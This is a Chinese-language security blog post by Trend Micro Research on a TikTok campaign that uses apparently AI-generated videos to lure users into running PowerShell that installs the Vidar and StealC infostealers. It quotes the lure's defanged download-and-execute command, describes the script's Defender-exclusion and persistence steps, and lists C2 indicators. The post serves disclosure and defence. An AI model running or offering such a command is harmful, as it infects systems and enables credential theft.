最近新的社交工程攻擊行動是利用TikTok龐大的使用者社群來散布Vidar和StealC資訊竊取惡意程式。有別於那些假冒CAPTCHA真人驗證網頁然後擷取剪貼簿內容來誘騙使用者執行惡意腳本的假CAPTCHA攻擊行動,這起新的攻擊行動利用了TikTok的熱門度以及廣為流傳的特性。
趨勢科技威脅研究中心發現了一起新的社交工程攻擊行動,利用TikTok龐大的使用者社群來散布Vidar和StealC資訊竊取惡意程式。有別於那些假冒CAPTCHA真人驗證網頁然後擷取剪貼簿內容來誘騙使用者執行惡意腳本的假CAPTCHA攻擊行動,這起新的攻擊行動利用了TikTok的熱門度以及廣為流傳的特性。
駭客使用了可能由AI生成的TikTok影片,藉由社交工程技巧,謊稱指導使用者如何啟用合法軟體或解鎖進階功能,誘騙使用者執行PowerShell指令。此次攻擊突顯出駭客隨時都在利用當下最流行的社群媒體平台來散播惡意程式。
跟著使用者走:社群媒體詐騙
長久以來,社群媒體平台一直都是駭客發動攻擊的管道之一,TikTok也不例外。先前的攻擊行動大多經由網站來發動,因此可以從其主頁被植入JavaScript來偵測駭客的惡意活動,但此次的TikTok攻擊行動則將社交工程技巧完全融入在影片內容當中。
社群媒體平台的龐大使用者社群與演算法,為駭客提供一個理想的散播機制。對駭客來說,這意味著他們不須負擔基礎架構的維護工作就能廣泛散播。此外,使用AI生成的內容,也可以讓這類攻擊從獨立的事件升級成大規模行動,因為這些影片製作起來很快,而且還能針對不同的使用者族群量身訂做。
另一個值得注意的一點是,PowerShell從一個技術工具變成社交工程工具。在這波攻擊行動中,駭客利用TikTok影片來口頭指示使用者在自己的系統上執行惡意指令。社交工程技巧已完全融入影片本身,不須透過可能被偵測的程式碼或腳本,所以平台上並無惡意程式碼可分析或攔截,等於讓資安解決方案派不上用場。所有的步驟說明都以影音方式呈現,駭客這麼做是為了躲避現有的偵測機制,讓資安人員更難偵測及切斷這些攻擊。
第一個案例
一開始,發現有一名TikTok使用者(@gitallowed)張貼了多個可能由AI生成的不露臉影片。從那之後,便陸續發現更多從事類似活動的帳號,包括@zane.houghton、@allaivo2、@sysglow.wow、@alexfixpc和@digitaldreams771,這些帳號目前都已停止活動。
這些影片會指示使用者執行一連串謊稱是合法軟體(如Windows作業系統、Microsoft Office、CapCut以及Spotify)啟用步驟的指令。這些影片的內容都非常類似,只有攝影機的角度和PowerShell用來取得惡意檔案的下載網址有些微差異,表示這些影片很可能是自動化產生。
除此之外,影片中的說話聲音似乎也是由AI所生成,再次證明這些影片很可能是使用AI工具來製作。
圖1顯示駭客使用的TikTok帳號個人檔案頁面,方便大家更了解這起攻擊的範圍和樣貌。
圖1 TikTok使用者帳號的個人檔案頁面,裡面有多部影片介紹如何啟用一些軟體,最終都是執行PowerShell指令。
這些會指示使用者執行PowerShell指令的影片當中,有一個吸引了超過2萬個讚和100多則回應,顯然使用者的參與度和信任度都很高。根據TikTok的數據分析顯示這部影片已獲得將近50萬次觀看。龐大互動量突顯出它的觸及率驚人,許多看過的使用者很可能都已經遵照了這些指示來執行。
在影片當中,駭客提供一系列簡易的逐步說明,讓整個執行過程看起既簡單又合法:
1. 按下Windows + R組合鍵。
2. 輸入「powershell」然後按Enter。
3. 執行指令iex (irm hxxps://allaivo[.]me/spotify) 這些步驟的設計是為了藉由社交工程手法誘騙使用者執行PowerShell指令來下載並執行一個遠端腳本,進而駭入使用者的系統。
惡意腳本的執行過程
PowerShell指令會從hxxps://allaivo[.]me/spotify下載一個腳本來執行(SHA256:b8d9821a478f1a377095867aeb2038c464cc59ed31a4c7413ff768f2e14d3886)。
整個攻擊過程如下:
1. 當腳本執行時,先在使用者的APPDATA和LOCALAPPDATA資料夾內建立隱藏的目錄,並將這些目錄加入Windows Defender的排除清單來躲避偵測。
2. 緊接著,它會從hxxps://amssh[.]co/file.exe下載另一個被判定為Vidar或StealC惡意程式的惡意檔案,並儲存在隱藏資料夾中。
3. 腳本會不斷重試來確保惡意檔案下載成功,然後將惡意程式執行檔啟動成一個隱藏且更高權限的處理程序。
4. 如果前面的程序順利完成,腳本會從hxxps://amssh[.]co/script[.]ps1下載另一個PowerShell腳本,並儲存在隱藏目錄中,然後建立系統登錄機碼,以便在系統開機時自動執行腳本。
5. 腳本會刪除暫存資料夾,以盡量避免留下可被用於鑑識分析的痕跡。此外,其嚴密的錯誤處理能力可確保感染過程順利完成。
幕後操縱基礎架構
接著,被下載的Vidar和StealC惡意程式會連上幕後操縱(CC)伺服器:
‧hxxps://steamcomm unity[.]com/profiles/ 76561199846773220 (Vidar)
‧hxxps://t[.]me/v00rd (Vidar)
‧hxxp://91[.]92[.]46[.]70/1032c730725d1721[.]php (StealC)
尤其特別的是,Vidar會利用Steam和Telegram這類合法服務來當成CC伺服器資訊的「固定情報交換點解析器」(Dead Drop Resolvers,簡稱DDR)來隱藏CC資訊。例如圖2這個Steam個人檔案當中就含有CC伺服器的實際IP位址,過程如圖3所示。
圖2 Steam個人檔案的內容。
圖3 散播Vidar和StealC惡意程式的攻擊行動感染過程。
對使用者和企業的資安疑慮
隨著駭客改用社群媒體來散布惡意程式,企業應重新審視自己的防禦策略。傳統的資安控管措施主要集中在惡意程式碼偵測、網址掃描以及網域信譽評等,這些對於濫用使用者信任來隱藏不肖意圖的攻擊成效不佳。企業必須採取一種更全面的作法,包括社群媒體監控、行為分析,以及針對性的使用者教育。主動解決這些攻擊管道,就能降低遭到大規模入侵的風險,不論對使用者和企業都有幫助:
‧將社群媒體平台也納入威脅監控:將社群媒體威脅情報來源整合,有助於企業追蹤新興的攻擊行動,發掘那些涉及提供不尋常或技術性操作指示的高互動性內容。由於駭客經常在多個平台上重複張貼相同的內容,因此交叉關聯不同社群媒體上的貼文,就能發掘彼此相連的攻擊行動,甚至是新興威脅。
‧納入行為分析:在駭客未使用到惡意程式碼的情況下,想要偵測惡意活動就必須監控使用者的行為,包括發掘異常的活動,例如執行PowerShell之類的系統工具。除此之外,執行非預期的指令、從不明網址直接下載、在未經授權的情況下建立資料夾,或是修改資安設定,這些都是危險訊號。
‧強化社交工程防範意識:員工訓練必須再次進化來超越網路釣魚,納入社群媒體影音攻擊手法。此外,也應鼓勵使用者仔細檢查不請自來的技術性操作指示、確認視訊來源的正當性,並且通報可疑內容,不論是社群媒體、即時通訊或電子郵件當中的內容。畢竟,凡是太過好康的東西,很可能就是詐騙。
Trend Vision One是將資安曝險管理、資安營運以及強大的多層式防護集中在一起的AI驅動企業網路資安平台,能協助預測及防範威脅,在所有數位資產上加速實現主動式防護的成果。資安領導人可評量自己的資安狀況,向所有利害關係人展示資安的持續改善。
<本文作者:Trend Micro Research 趨勢科技威脅研究中心 本文出自趨勢科技資安部落格,是由趨勢科技資安威脅研究員、研發人員及資安專家全年無休協力合作,發掘消費者及商業經營所面臨層出不窮的資安威脅,進行研究分析、分享觀點並提出建議。>